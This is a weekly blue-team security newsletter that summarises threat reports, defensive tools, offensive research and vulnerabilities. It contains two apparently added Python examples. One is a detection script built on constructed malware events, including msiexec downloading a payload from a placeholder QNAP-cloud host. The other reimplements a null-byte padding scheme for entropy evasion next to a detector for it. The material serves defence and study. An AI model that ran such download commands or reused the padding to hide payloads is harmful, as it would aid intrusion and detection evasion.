Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading).
Operationally this week ransomware continues to plague. Outside of this is further evidence that no company is immune to breach. From Cloudflare who detected a campaign quickly through to Twilio who fared a little less well when subjected to the same one. Kudos to both for disclosing technical detail and quickly. Cisco also disclosed a breach from March this year which resulted in administrative access being obtained on their domain controllers.
In the high-level this week:
Greek intelligence service boss quits amid wiretapping allegations - the fallout from the use of Predator (a Pegasus competitor) continues.
Thai National Cyber Security Agency signs MoU to collaborate with Huawei - The purpose is to increase cybersecurity skills for Thai IT personnel through promoting Huawei's E-Lab online learning platform, and organizing competition projects and Huawei training courses - China shaping their future operating environment
Help US Companies Compete Against China on Technology Standards - interesting article for several reasons, not least the ‘it is unfair’ narrative and the general geopoliticisation of standards processes. It likely means we are inevitably going to end up with suboptimal outcomes on all fronts whilst having to expend more effort to mitigate.
A Cyber Policy Portal and the National Cyber Survey is mentioned in the annual progress report of the United Nations Open-Ended Working Group on security of and in the use of information and communications technologies.
SlowMist first half of 2022 blockchain security and anti-money laundering analysis report - this report is in Chinese, but gives a fascinating insight: A total of 187 security incidents occurred in the first half of 2022, with a loss of US$1.976 billion - 74.6% of the money laundered in security incidents went to Tornado.
US Treasury Sanctions Notorious Virtual Currency Mixer Tornado Cash - almost as if related to the previous, but specifically related to North Korea related cyber activity (at least) - the scale being: since becoming active in August 2019, Tornado Cash has received over $7.6 billion worth of Ethereum, a sizable portion of which have come from illicit or high-risk sources.
Implications of Emerging Privacy Enhancing Technologies for UK Surveillance Policy - from the UK’s new Centre for Emerging Technology and Security based at the Alan Turing Institute - our version of the Georgetown Center for Security and Emerging Technology.
US Cyber ambassador could soon take on a world of challenges - article outlining the challenges for the new ambassador.
US Federal Communications Commission Urges Emergency Alert System (EAS) Participants to Secure EAS Equipment - a worrying state of affairs and likely the result of lax regulation and no mandated resilience assessments.
Network Open Source Traceability - Necessity and Feasibility Analysis of International Cyber Attack Source Traceability Mechanism - by Tang Lan, Director and Researcher of the Cyberspace Security Governance Research Center of the China Institute of Contemporary International Relations. Chinese high-level Internet policy paper which could be read in numerous ways beyond the four challenges it outlines. It provides an interesting insight into how the Chinese government is thinking about control of the cyber attribution narrative.
China launches 272 attempts at spreading disinformation in Taiwan in a week - repercussions from the visit last week.
Chinese technology in the ‘Internet of Things’ poses a new threat to the west - although in the UK’s Financial Times, it isn’t by the FT. A view from a consultancy on the risk posed by cellular components in IoT.
US’s CISA added two new known to be exploited vulnerabilities to their list - tick tock goes the clock for federal agencies to patch these vulnerabilities.
Book club this week is Power, Participation, and Private Regulatory Initiatives: Human Rights Under Supply Chain Capitalism:
More recently, many business and human rights advocates have considered the development and enforcement of private regulatory initiatives (PRIs) to certify that actors along the supply chain conform to certain codes of conduct. Many advocates see these PRIs as holding the potential to create better outcomes—whether for workers, affected communities, or the environment—within a global economy structured by supply chain capitalism.
You have to wonder if there is an analogue here with cyber that should be happening? Adjunct to this is the article How to Achieve Minimum Necessary Rigor, which makes the observation that excessive rigor can impede progress in research in applied settings. It states some obvious facts, but shows how far cyber has to go.
Finally there is a Summer Course in Security and Technology for policy makers and diplomats happening in September run by the UN Institute for Disarmament Research and UN Institute for Training Research. Personally I get excited when we upskill those negotiating and/or defining the future policy environment for us all. It will have a specific focus on the intersection between law, information communication technologies and artificial intelligence.
Have a lovely Friday,
Ollie
Cyber threat intelligence
Who is doing what to whom and how.
Targeted attack on industrial enterprises and public institutions
Chinese industrial control system activity in Russia and beyond. Initial access was via a phishing e-mail and a very old exploit.
In January 2022, [our] ICS CERT experts detected a wave of targeted attacks on military industrial complex enterprises and public institutions in several countries.
The attack targeted industrial plants, design bureaus and research institutes, government agencies, ministries and departments in several East European countries (Belarus, Russia, and Ukraine), as well as Afghanistan.
The attackers were able to penetrate dozens of enterprises and even hijack the IT infrastructure of some, taking control of systems used to manage security solutions.
https://securelist.com/targeted-attack-on-industrial-enterprises-and-public-institutions/107054/
North Korean H0lyGh0st Ransomware Has Ties to Global Geopolitics
An overview of North Korean ransomware operations as they continue to gain access to funds. Interesting that they were able to quickly flip an n-day vulnerability into their operations, but beyond that little that will come as a surprise.
Once on a victim’s machine, the H0lyGh0st ransomware first exfiltrates a copy of all files prior to encryption. And as one would expect, next comes the demand for ransom. If the victim does not comply and pay up, the threat actor then threatens to publish all of the exfiltrated files online.
Although it has not yet been confirmed exactly how victims’ machines are infected, there is some suspicion that the threat group has used the DotCMS remote code execution vulnerability (CVE-2022-26352), or a similar exploit to gain access to targets before dropping the payload for execution.
https://blogs.blackberry.com/en/2022/08/h0lygh0st-ransomware
Gwisin Ransomware Targeting Korean Companies
Two bits of reporting on the same ransomware threat coming out of South Korea. Interesting for several reasons, not least the regional focus, the industries being targeted and the multi platform nature.
The cases of Gwisin ransomware attacking Korean companies are recently on the rise. It is being distributed to target specific companies. It is similar to Magniber in that it operates in the MSI installer form. Yet unlike Magniber which targets random individuals, Gwisin does not perform malicious behaviors on its own, requiring a special value for the execution argument. The value is used as key information to run the DLL file included in the MSI.
https://asec.ahnlab.com/en/37483/
[We] discovered a new ransomware family targeting Linux-based systems. The malware, dubbed GwisinLocker was detected in successful campaigns targeting South Korean industrial and pharmaceutical firms. The malware is notable for being a new malware variant produced by a previously little known threat actor, dubbed “Gwisin” (귀신) — a Korean word meaning ‘ghost’ or ‘spirit’ — and targeting systems running the open source Linux operating system. The ransomware is deployed following a substantial network compromise and data exfiltration.
North Korean hacker organization is attacking by impersonating a large domestic portal cloud service
North Korea continue to show they have social engineering game in this campaign. Strong lure theme…
Users need to pay special attention as a series of book-linked hacking attacks disguised as a cloud sharing invitation service by a large domestic portal company are being caught.
The target of this attack is mainly experts and journalists working in the field of North Korea, and the attack is in the form of a phishing email impersonating an actual service to these targets.
The attack carried out on Saturday disguised as if they shared the file 'The history of North Korea's nuclear development and the prospects for the development of U.S.-DPRK relations', and the cloud sharing invitee delivered it by impersonating the name of a person who served as the first deputy director of the National Intelligence Service for foreign affairs and North Korea during the previous government.
https://blog-alyac-co-kr.translate.goog/4869?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp
Analysis of APT32 Organization's Attack Activities on my country's Guanji Units
Vietnamese activity in China being outed. Beyond that, little of note other than the increasing capability of Chinese cyber firms, maybe.
In this incident, the APT32 organization chose the RemyRAT remote control Trojan as a backdoor program and implanted it into the National Guanji Unit.
VileRAT: DeathStalker’s continuous strike at foreign and cryptocurrency exchanges
Pierre Delcher and Giampaolo Dedola expose a campaign primarily focused on Russia and using malicious documents as the infection vector. They attribute it to an actor called DeathStalker, which has crossovers with Evilnum.
Note the sectoral targeting and the lack of apparent direct financial gain intent.
VileRAT, its loader and associated infection chain were continuously and frequently updated for more than two years, and are still leveraged to persistently target foreign currency and cryptocurrency exchange brokers, with a clear intent to escape detection.
We still, however, cannot determine what DeathStalker’s principal intention against such targets is: it could range from due diligence, asset recovery, information gathering in the context of litigation or arbitration cases, aiding its customers in working around sanctions and/or spying on the targets’ customers, but it still does not appear to be direct financial gain.
https://securelist.com/vilerat-deathstalkers-continuous-strike/107075/
Who Needs Macros? | Threat Actors Pivot to Abusing Explorer and Other LOLBins via Windows Shortcuts
Aleksandar Milenkoski shows how Windows LNK files and living-off-the-land binaries are being chained. Also note the rapid commoditisation of the technique due to the production of tooling which enables others to utilise it.
Windows Explorer (explorer.exe) is the top initial living-off-the-land binary (LOLbin) in the chain of LOLbins that threat actors abuse to execute malware through malicious Windows shortcuts (LNK files). Our mass-analysis of 27510 representative malicious LNK files from VirusTotal revealed Windows Explorer at the top of the list (with 87.2% prevalence), followed by powershell.exe (7.3%), wscript.exe (4.4%), and rundll32.exe (0.5%).
LNK files are currently immensely popular among threat actors for malware deployment and persistence. We have observed intensive advertising of new versions of the mLNK and QuantumBuilder tools for building malicious LNK files in the cybercrime web space since May 2022, with many new features for evasion and stealth.
The mLNK and QuantumBuilder tools enable threat actors to build malicious LNK files in a configurable and convenient manner. Given the popularity of LNK files among threat actors, there is an increasing demand for such tools on the cybercrime market.
The actors behind the QuantumBuilder tool for building malicious LNK files advertise the tool and the value of LNK files to threat actors by claiming that Office macros “are for the most part dead” [as a medium for deploying malware], referring to Microsoft’s recent decision to disable by default Office macro execution in the context of documents that originate from untrusted sources.
Pivoting on a SharpExt to profile Kimusky panels for great good
Jason Reaves builds on the work of others to expand understanding of the campaign by North Korea intended to steal e-mails through their browser extension. The work contributes increased understanding of victimology including Europe.
Andariel deploys DTrack and Maui ransomware
Kurt Baumgartner helps attribute this ransomware with technical indicators:
While CISA provides no useful information in its report to attribute the ransomware to a North Korean actor, we determined that approximately ten hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the target, preceded by 3proxy months earlier. This data point, along with others, should openly help solidify the attribution to the Korean-speaking APT Andariel, also known as Silent Chollima and Stonefly, with low to medium confidence.
He also shows how they (North Korea) first took it for a spin in Japan and earlier than first thought.
On July 7, 2022, the CISA published an alert, entitled, “North Korean State-Sponsored Cyber Actors Use Maui Ransomware To Target the Healthcare and Public Health Sector,” related to a Stairwell report, “Maui Ransomware.”
We extend their “first seen” date from the reported May 2021 to April 15th 2021, and the geolocation of the target, to Japan. Because the malware in this early incident was compiled on April 15th, 2021, and compilation dates are the same for all known samples, this incident is possibly the first ever involving the Maui ransomware.
https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/
The DGA family Orchard continues to change, and the new version uses Bitcoin transaction information to generate DGA domain names
Chinese and translated Chinese reporting on this novel technique. The Chinese reporting was released first, hence its inclusion to allow for compare and contrast. Using Bitcoin wallet information as a variable for DGA input is interesting, but I suspect it is also susceptible to disruption.
Recently we discovered a new botnet that uses Satoshi Nakamoto's Bitcoin account transaction information to generate DGA domain name. Because of the uncertainty of Bitcoin transactions, this technique is more unpredictable than using the common time-generated DGAs, and thus more difficult to defend against.
The technique was discovered in a family of botnets we called Orchard. Since February 2021, this botnet has gone through 3 versions, and even switched programming languages in between.
Unravelling a Mimikatz campaign
Will Thomas shows, the UK Computer Misuse Act notwithstanding, the value of being able to do active discovery on the Internet. Will managed to uncover and disrupt a campaign which appears active in Japan based on one open server. Good lesson in analytical tradecraft.
The key findings were as follows:
The threat actor was active between 22 July and 7 August 2022 (see Figure 3)
There were 78 attacks in total, based on number of files created in the open directory
54 unique IPs were targeted, the vast majority of which were located in Japan, followed by the US, Canada, Ireland, Ukraine, Russia, India, and Australia (see Figure 4)
44 unique IPs were from fixed line IPs on Maxihost Japan (see Figure 5)
Several IPs from the same CIDR range were targeted multiple times on different days
Attacks began mostly around 4am (UTC) and ended most days around 7pm (UTC) (see Figure 6)
https://blog.bushidotoken.net/2022/08/unravelling-mimikatz-campaign.html
An inside view of domain anonymization as-a-service
If the previous post was on the right side of UK law then this post by Benoit ANCEL would be way over the other end and not possible in the UK because of the Computer Misuse Act. They reused a leaked JWT token in order to gain access to a panel allowing them to understand victimology.
From a simple mistake made by an operator, we managed to collect and exploit a lot of precious information from a “Fast Flux” network called BraZZZerS Fast Flux between end of 2018 and 2022.
The admins edited the Nginx configuration file by setting “error_log off” where “off” should actually be a path. The way the virtual hosts were configured ended up writing the error_log in a file called “off” in the html directory!
The logs showed us that the Nemty’s web panel was based (until the last year of Nemty’s life) on socket.io. The polling service was leaking very important information on a GET request: the JWT token. By reusing that token in a cookie, you could access the Nemty’s panel authenticated as the user related to the token:
https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145
New HiddenAds malware affects 1M+ users and hides on the Google Play Store
Dexter Shin shows that basic tradecraft (or cruftware) will get you 1 million installs if you try. The post itself is a bit FUD and product placement heavy, but also includes some interesting insights into how orchestrated the campaign was:
To promote these apps to new users, the malware authors created advertising pages on Facebook.
The authors also understand Android.
This malware uses the Contact Provider. The Contact Provider is the source of data you see in the device’s contacts application, and you can also access its data in your own application and transfer data between the device and online services.
..
The important thing is the Contact Provider automatically interrogates newly installed or replaced packages. Thus, installing a package containing special metadata will always call the Contact Provider automatically.
The first activity defined in the application tag in the manifest file is executed as soon as you install it just by declaring the metadata. The first activity of this malware will create a permanent malicious service for displaying advertisements.
BumbleBee Roasts Its Way to Domain Admin
From our friends at the DFIR report on an April 2022 intrusion. The initial access tradecraft we have covered extensively over the last few months. Punch line is if you have mitigated ISO and LNK files via e-mail you are going to be OK.
During this intrusion, the threat actors gained access using an ISO and LNK file, used several lateral movement techniques, dumped credentials three different ways, kerberoasted a domain admin account and dropped/executed a bespoke tool for discovering privilege escalation paths.
https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/
Raspberry Robin: Highly Evasive Worm Spreads over External Disks
Onur Mustafa Erdogan provides an update on this threat. The point really to take away is that QNAP cloud is being used as a distribution mechanism. This should stick out in most networks as an IoC.
Raspberry Robin is a worm that spreads over an external drive. After initial infection, it downloads its payload through msiexec.exe from QNAP cloud accounts, executes its code through rundll32.exe, and establishes a command and control (C2) channel through TOR connections.
Raspberry Robin is delivered through infected external disks. Once attached, cmd.exe tries to execute commands from a file within that disk. This file is either a .lnk file or a file with a specific naming pattern.
https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks
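A detection sketch for the three behaviours quoted above (msiexec.exe fetching its payload from a remote URL, rundll32.exe spawned by msiexec.exe, and cmd.exe reading commands from a non-system drive). This is an added example, not code from the Cisco post; the Sysmon-style events are constructed, and the QNAP DDNS suffix and the system drive letter are assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed Sysmon-style process-creation events (Event ID 1 fields); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /R <E:\RECYCLER\setup.lnk"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"msiexec /q /i http://example-tenant.myqnapcloud.com:8080/update?hostname=PC01"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"rundll32.exe C:\Windows\Temp\payload.dll,Entry"},
    {"Image": r"C:\Windows\System32\msiexec.exe",          # benign: local installer
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"msiexec /i C:\Users\alice\Downloads\7zip.msi /qn"},
    {"Image": r"C:\Windows\System32\cmd.exe",              # benign: system drive only
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c dir C:\Users\alice"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# A drive letter followed by ":\" that is not part of a longer word (avoids matching inside URLs).
DRIVE_RE = re.compile(r"(?<![A-Za-z])([A-Za-z]):\\")
SYSTEM_DRIVE = "C"                 # assumption: the OS volume is C:, anything else may be external media
QNAP_SUFFIX = ".myqnapcloud.com"   # assumption: QNAP's DDNS domain is what "QNAP cloud accounts" resolve to


def exe_name(path):
    """Last path component, lower-cased, so image comparisons ignore install location and case."""
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Return the list of rule names the event matches (empty list for benign events)."""
    image = exe_name(ev["Image"])
    parent = exe_name(ev["ParentImage"])
    cmd = ev["CommandLine"]
    hits = []
    if image == "msiexec.exe":
        # Payload download over HTTP(S) straight from the installer service.
        for url in URL_RE.findall(cmd):
            hits.append("msiexec-remote-url")
            host = (urlparse(url).hostname or "").lower()
            if host.endswith(QNAP_SUFFIX):
                hits.append("msiexec-qnap-cloud")
    if image == "rundll32.exe" and parent == "msiexec.exe":
        # Execution stage: DLL run via rundll32 immediately under msiexec.
        hits.append("rundll32-child-of-msiexec")
    if image == "cmd.exe":
        # Initial stage: cmd.exe executing commands from a file on an attached disk.
        drives = {m.upper() for m in DRIVE_RE.findall(cmd)}
        if drives - {SYSTEM_DRIVE}:
            hits.append("cmd-reads-non-system-drive")
    return hits


def detect(events):
    """(event index, rule name) pairs for every rule hit across a batch of events."""
    return [(i, hit) for i, ev in enumerate(events) for hit in check_event(ev)]


if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} <- {SAMPLE_EVENTS[idx]['CommandLine']}")
```

The msiexec rule will also fire on legitimate remote MSI deployments, so allow-list the hosts your software distribution actually uses and treat the QNAP and rundll32 hits as the high-confidence ones.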
Novel News on Cuba Ransomware: Greetings From Tropical Scorpius
Anthony Galiette, Daniel Bunce, Doel Santos and Shawn Westfall discuss a ransomware actor who is exhibiting techniques towards the upper end of the sophistication scale. Including using leaked code signing keys.
Here, we start with an overview of the ransomware and focus on an evolution of behavior observed leading up to deployment of Cuba Ransomware. While this behavior was consistent for over a year, [we have] observed some recent changes. This includes providing an overview of the ransomware’s functionality and algorithms, as well as covering the technical details of the tactics, techniques and procedures (TTPs) used by Tropical Scorpius. Specifically, this involves:
A new malware family that [we] track as ROMCOM RAT.
A weaponized local privilege escalation exploit to SYSTEM.
A new Kerberos tool that [we] track as KerberCache.
A kernel driver for targeting security products.
Identifying the use of the ZeroLogon hacktool.
https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/
Discovery
How we find and understand the latent compromises within our environments.
New Version of Microsoft 365 User Activity Report Available
Tony Redmond shows how to use the Microsoft graph API to build a user activity report. Interesting caveats that the API doesn’t capture all user activity.
Microsoft 365 user activity report, a PowerShell script that assembles data from SharePoint Online, Exchange Online, Teams, OneDrive for Business, and Yammer activity to build a picture of how active a user account is, with the intention of removing underused or unused accounts to save on licensing costs.
Recently, a reader pointed out that the usage report API now supports a lookback period of 180 days, doubling the previous 90 days.
The usage report API doesn’t capture data about every possible user activity, nor does it cover all workloads. For instance, there’s no usage API covering Stream and Planner activity.
https://office365itpros.com/2022/08/08/microsoft-365-user-activity-2022/
Persistence Sniper
Federico Lag provides a valuable work aid for incident response and hunt teams.
PersistenceSniper is a Powershell script that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines.
https://github.com/last-byte/PersistenceSniper
Report on changed Active Directory groups using PowerShell
Harm Veenstra provides a script which will help defence teams monitor key user groups in AD for any unauthorised changes.
[The script] shows the difference in members between the previous time it ran and the current situation, logs [are] saved for reviewing purposes and an email should be sent when there is a change detected.
https://powershellisfun.com/2022/07/13/report-on-changed-active-directory-groups-using-powershell/
Report on Active Directory OU permissions using PowerShell
Harm Veenstra provides another script which will help defence teams spot subtle changes to permissions which may be an attempt at persistence within AD or other indicator of compromise.
The script should be able to scan all OU’s in the Active Directory Domain, but you should also be able to specify a certain OU to start in including all child OU’s. The output should be stored in a CSV file for easy import in Excel or other tools which could report on the data. Things like inheritance should be reported and on what type of objects the permissions were given. (For example when Delegate Control was used for Helpdesk tasks like reset/unlock account etc.)
https://powershellisfun.com/2022/07/21/report-on-active-directory-ou-permissions-using-powershell/
Retrieve Security events from Active Directory using PowerShell
Harm Veenstra achieves a hat trick with this script which can be someone’s morning task to review.
The script should get a list of all events regarding users added/deleted/changed, but also for group membership changes. It should output them in a .csv file and have the possibility to email those changes if found. Also, it should be able to run at an interval and you should be able to specify a time frame in which the events are retrieved.
LNK module for Yara
John Southworth has initiated a pull request for Yara which adds support for LNK file parsing. Given the heavy usage this is a great contribution 👏.
This module will parse the Windows Shell Link (LNK) file format, and make a lot of its data accessible via YARA
https://github.com/VirusTotal/yara/pull/1732
Defence
How we proactively defend our environments.
MITRE ATT&CK in Google Cloud Platform (GCP): A defender’s cheat sheet
Sometimes the value of this newsletter is that I register on those forms so you don’t have to. This was tucked away behind one.
This guide contains a breakdown of tactics we see attackers use most often during attacks in Google Cloud Platform (GCP). To give you a jump start on your own GCP environment, we’ve mapped the GCP services where these tactics often originate (thanks, crafty attackers) along with the API calls they make to execute on these techniques
https://expel.com/wp-content/uploads/2022/08/Expel-GCP-mind-map-kit-080422.pdf
IAM Deescalate
Neat work here building on something we released at NCC Group. This will help teams tighten up their AWS environments.
IAM-Deescalate helps mitigate privilege escalation risk in AWS identity and access management (IAM). It identifies the IAM users and roles with privilege escalation risk using NCC Group's PMapper and creates a set of policies to "deescalate" the risk. IAM-Deescalate was developed when we were working on the Cloud Threat Report Vol. 6.
https://github.com/PaloAltoNetworks/IAM-Deescalate
Sysmon for Linux Pipeline for Elastic Agent
Michael Taggart released some Sysmon for Linux to Elastic glue.
This Ingest Pipeline, which tacks onto your existing syslog pipeline, will process Sysmon Event IDs and provide useful data!
gist.github.com/mttaggart/efc870e02eb603943e0dae8ebd54d3dc
matano: The open-source security lake platform for AWS
Going to buy me some Amazon shares..
Matano is an open source security lake platform for AWS. It lets you ingest petabytes of security and log data from various sources, store and query them in an open Apache Iceberg data lake, and create Python detections as code for realtime alerting. Matano is fully serverless and designed specifically for AWS and focuses on enabling high scale, low cost, and zero-ops.
https://github.com/matanolabs/matano
Protect against AiTM/ MFA phishing attacks using Microsoft technology
Jeffery Appel provides practical steps on how to mitigate the rising instances of attackers doing adversary-in-the-middle (AiTM) to subvert multi-factor authentication. This should be read by all defence teams in Microsoft heavy estates.
In the last couple of weeks, many researchers warned of a new large-scale phishing campaign that is using adversary-in-the-middle (AiTM) techniques to bypass multi-factor authentication.
With the growing enablement/adoption of MFA it is expected that AiTM phishing is growing in the upcoming next years (attackers using new techniques). Protecting against AiTM phishing is important.
Protecting is possible based on various configurations:
Phish-resistant MFA solutions (FIDO/ Certificate based authentication)
Protect attacks using Conditional Access
Monitoring/ protecting using Microsoft 365 Defender/ Azure AD Identity Protection
Build-in alerting rules
https://jeffreyappel.nl/protect-against-aitm-mfa-phishing-attacks-using-microsoft-technology/
How to Attack and Remediate Excessive Network Share Permissions in Active Directory Environments
Scott Sutherland provides an overview of the problem and a new tool to help with risk minimisation.
a new open-source tool called PowerHuntShares that can help streamline share hunting and remediation of excessive SMB share permissions in Active Directory environments.
BlueHound
Will be interesting to see if the number of tool ingest parsers increases for this project. Using a graph database in this manner could be super useful for uncovering threats to environments that would have been previously difficult to find.
BlueHound is an open-source tool that helps blue teams pinpoint the security issues that actually matter. By combining information about user permissions, network access and unpatched vulnerabilities, BlueHound reveals the paths attackers would take if they were inside your network
https://github.com/zeronetworks/BlueHound
Certipy 4.0
Oliver Lyak continues to deliver quality whilst likely causing SpecterOps a degree of heartburn for BloodHound Enterprise.
A new version of Certipy has been released along with a forked BloodHound GUI that has PKI support! In this blog post, we will look at some of the major new features of Certipy, which includes LDAPS (Schannel) and SSPI authentication, new request options and methods, and of course support for the forked BloodHound GUI that I changed to have new nodes, edges, and prebuilt queries for AD CS. At the end of the blog post, we will also look at the two new privilege escalation techniques for AD CS: ESC9 and ESC10.
Offense
Attack capability, techniques and tradecraft.
SCM Kit
New attack kit just aimed at Source Code Management platforms. Expect threat actor real-world usage in 3..2..
Source Code Management Attack Toolkit - SCMKit is a toolkit that can be used to attack SCM systems. SCMKit allows the user to specify the SCM system and attack module to use, along with specifying valid credentials (username/password or API key) to the respective SCM system. Currently, the SCM systems that SCMKit supports are GitHub Enterprise, GitLab Enterprise and Bitbucket Server. The attack modules supported include reconnaissance, privilege escalation and persistence. SCMKit was built in a modular approach, so that new modules and SCM systems can be added in the future by the information security community.
https://github.com/xforcered/SCMKit
Tampering Syscalls
Rad K provides a neat technique which sparked a thread on Twitter.
Proof-of-concept for syscall retrieval using hardware break points and exception handling. You can either use this to retrieve syscalls, and/or use it as an alternative to direct syscalls to execute these using the internal state machine.
https://fool.ish.wtf/2022/08/tamperingsyscalls.html
https://github.com/rad9800/TamperingSyscalls
VEH|SEH API Resolve
Rad K provides further headaches for EDR vendors to consider when detecting malicious code based on API usage.
Inspired by Dridex Loader's 32 bit API obfuscation - uses Vectored Exception Handlers on Windows (the hook for detection) to resolve APIs to avoid EDR detection
https://github.com/rad9800/VehApiResolve
D&R Dynamic Shellcode
Orca provides a drop-in for a first stage payload.
D.RDynamicShellcode; Download & Run Dynamic Shellcode: it reads the shellcode from a URL (has to be downloadable), locates it in a RWX section in memory and runs it, useful for people looking for a shellcode as a 1st stage
https://gitlab.com/ORCA000/d.rdynamicshellcode
ClipboardInject - Abusing the clipboard to inject code into remote processes
Matthew shows how the clipboard can be used as an inter-process data transfer mechanism which, if leveraged, would cause some challenges for detection.
This post describes another code injection technique that I developed a while ago. This time, we will be using the Windows clipboard to transfer an executable payload into another process.
https://www.x86matthew.com/view_post?id=clipboard_inject
Running Exploit As Protected Process Light From Userland
Uses the recently patched (21H2 10.0.19044.1826, 24 July 2022) vulnerability in Protected Process Light to run any code at the highest level of protection, meaning that the exploit will have full access and the anti-malware service can't monitor it.
Real-World Detection Evasion Techniques in the Cloud
Christopher Doman walks through some evasion techniques seen in the wild in cloud environments. Nothing overly novel in terms of attacker tradecraft, but good training for those who aren’t familiar.
Persist Assist
Grimmie shows us Windows persistence techniques becoming commoditised with this new framework.
Fully modular persistence framework - written in C#. All persistence techniques contain a cleanup method which will serve to remove the persistence aside from the persistence code.
https://github.com/FortyNorthSecurity/PersistAssist
Backdooring Grub2
Nicholas Starke shows a nice end-to-end technique targeting LUKS volume passwords. It also shows the need for bootloaders to be cryptographically signed.
What I wanted to accomplish was to send the cleartext LUKS password to a remote server when the password is entered as part of the Grub2 boot process
https://nstarke.github.io/grub2/bootloader/2022/08/07/backdooring-grub2.html
Entropy Fix
Orca releases another tool which will frustrate some detection techniques.
A tool to reduce the entropy of your payload. It works by adding null bytes in an ordered sequence: every 10 bytes it adds 5 null bytes - designed to avoid high-entropy detection
https://gitlab.com/ORCA000/entropyfix
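To show what the padding scheme described above does to the usual Shannon-entropy heuristic, and a check that is not fooled by it, here is an added example (not the tool's code) in Python; the payload is a constructed uniform byte string standing in for a packed blob, and the function and threshold names are assumptions.

```python
import math

# Constructed stand-in for a high-entropy payload: a uniform byte distribution,
# which scores the maximum 8 bits/byte. Not a real payload.
SAMPLE_PAYLOAD = bytes(range(256)) * 4


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0); the usual packed/encrypted heuristic."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pad_with_nulls(payload: bytes, chunk: int = 10, nulls: int = 5) -> bytes:
    """Reproduce the padding scheme the page describes (after every `chunk` payload
    bytes insert `nulls` zero bytes) so its effect on the heuristic can be measured."""
    out = bytearray()
    for i in range(0, len(payload), chunk):
        out += payload[i:i + chunk]
        out += b"\x00" * nulls
    return bytes(out)


def entropy_ignoring_nulls(data: bytes) -> float:
    """Entropy of the non-zero bytes only. Zero padding cannot lower this figure; the cost
    is discarding legitimate zero bytes, which is negligible for a high-entropy blob."""
    return shannon_entropy(bytes(b for b in data if b != 0))


def null_fraction(data: bytes) -> float:
    """Share of zero bytes; a large share next to high non-null entropy is itself unusual."""
    return data.count(0) / len(data) if data else 0.0


def looks_high_entropy(data: bytes, threshold: float = 7.5) -> bool:
    """Detector that is robust to null padding: judge the non-null bytes, not the raw blob."""
    return entropy_ignoring_nulls(data) >= threshold


if __name__ == "__main__":
    padded = pad_with_nulls(SAMPLE_PAYLOAD)
    print(f"raw entropy:           {shannon_entropy(SAMPLE_PAYLOAD):.2f}")
    print(f"padded entropy:        {shannon_entropy(padded):.2f}")
    print(f"padded, nulls ignored: {entropy_ignoring_nulls(padded):.2f}")
    print(f"null fraction:         {null_fraction(padded):.2f}")
```

Running it shows the raw blob drop from 8.0 to roughly 6.2 bits/byte after padding, while the null-ignoring figure stays near 8.0.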
Backdooring Office Structures. Part 2
Mariusz Banach shows how code can be squirreled away in various parts of Microsoft Office file structures. It still needs code to extract and use the payload, however.
This blog post discusses yet another technique, which as far as I’m concerned – represents a novel, stealthy primitive for storing larger chunks of data that could be easily extracted using specific VBA logic. We introduce an idea of weaponising Custom XML parts storage, available in MS Word, Excel and PowerPoint for the purpose of concealing initial access payloads.
https://mgeeky.tech/payload-crumbs-in-custom-parts/
Vulnerability
Our attack surface.
Looking at Patch Gap Vulnerabilities in the VMware ESXi TCP/IP Stack
Shows that forking open source means attackers can operate in a world of n-days if vendors don’t keep pace, which they didn’t in this case..
The most interesting outcome of this analysis is that ESXi’s TCP/IP stack is based on FreeBSD 8.2 and does not include security patches for the vulnerabilities disclosed over the years since that release of FreeBSD.
K14649763: Overview of F5 vulnerabilities (August 2022)
Lots and lots; technical security debt appears very real. There is probably a case study to be done here, from the genesis vulnerabilities and subsequent exploitation which brought the product to the attention of researchers, through to the resulting forced payback of said tech debt.
I wrote a post on this in December, 2011 titled Breaking the Inevitable Niche/Vertical Technology Security Vulnerability Lifecycle which had this graphic:
Feels like they are in the fourth segment..
https://support.f5.com/csp/article/K14649763
Apple Safari IDN URL Spoofing
A patched vulnerability in Apple Safari IDN handling allows attackers to perform URL spoofing, as Safari does not convert inappropriate Unicode in the URL bar to Punycode.
https://ssd-disclosure.com/ssd-advisory-apple-safari-idn-url-spoofing/
Uncle Maker: an attack on Ethereum's consensus mechanism
Can be used by miners to obtain consistently higher mining rewards compared to the honest protocol.
Researching Open Source apps for XSS to RCE flaws
Why XSS remains powerful..
In this article I’ll show how to achieve a Remote Code Execution via XSS on the examples of Evolution CMS, FUDForum, and GitBucket.
https://swarm.ptsecurity.com/researching-open-source-apps-for-xss-to-rce-flaws/
Exploitation
What is being exploited.
Microsoft SharePoint Server WizardConnectToDataStep4 Deserialization Of Untrusted Data RCE
Patched during the June update of SharePoint - allows authenticated attackers that are able to create a Site on the server to cause it to execute arbitrary code.
Tooling and Techniques
Low level tooling for attack and defence researchers.
ImHex Pattern and YARA Functionality
Using ImHex to build understanding of structured content and how to use the built-in YARA functionality.
https://blog.xorhex.com/blog/quickimhexpatternyaratutorial/
YARA for (malware/implant) config extraction
